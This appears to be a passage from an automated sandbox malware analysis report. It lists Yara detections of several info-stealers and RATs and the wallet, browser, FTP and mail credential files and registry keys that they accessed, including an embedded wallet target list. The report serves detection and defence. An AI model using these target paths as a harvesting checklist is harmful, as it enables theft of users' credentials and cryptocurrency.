Source: Yara match	File source: 15.0.hjhTHr6fWy.exe.980000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.gold.exe.37a5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.436080.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.436080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.crypted.exe.39e5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.0.newbundle2.exe.c20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2695505270.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2858375876.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.2951592112.0000000000C41000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2955093646.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3088502787.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.2743413238.0000000000982000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gold.exe PID: 2972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hjhTHr6fWy.exe PID: 1856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: penis.exe PID: 7152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: crypted.exe PID: 2956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6472, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED

Yara detected Socks5Systemz

Source: Yara match	File source: 00000017.00000002.3340691563.000000000279D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fidovideorecorder32_64.exe PID: 3288, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 19.0.stealc_default2.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.needmoney.exe.30ea4b9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.needmoney.exe.3740000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.needmoney.exe.3710000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.needmoney.exe.3710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.needmoney.exe.30ea4b9.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.needmoney.exe.3740000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.stealc_default2.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.3006538986.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.2774274390.0000000000F51000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2996521135.0000000000F51000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2972396756.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2971489446.0000000003710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe, type: DROPPED
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 37.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.rstxdhuj.exe.4141590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.rstxdhuj.exe.418fdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match	File source: 24.0.penis.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\ElectronCash\wallets\\.
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q2C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\window-state.json
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\\exodus.conf.jsonFD
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.walletLR]q$>
Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\info.seco
Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000FBA000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum\walletsLR]q
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q%appdata%`,]qdC:\Users\user\AppData\Roaming`,]qdC:\Users\user\AppData\Roaming\Binance
Source: RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000FBA000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: file__0.localstorage
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q&%localappdata%\Coinomi\Coinomi\walletsLR]q
Source: hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $]q6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
Source: stealc_default2.exe, 00000013.00000002.2996721656.0000000000FBA000.00000004.00000001.01000000.00000012.sdmp	String found in binary or memory: MultiDoge
Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\seed.seco
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Ethereum\\keystore
Source: stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\.L
Source: stealc_default2.exe, 00000013.00000002.2994583849.00000000007E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Electrum-LTC\wallets\\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004

Source: Yara match	File source: 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.3153539765.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: hjhTHr6fWy.exe PID: 1856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6472, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 00000016.00000002.2960319681.0000000003119000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 24.0.penis.exe.ca0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000018.00000000.2860928710.0000000000CA2000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
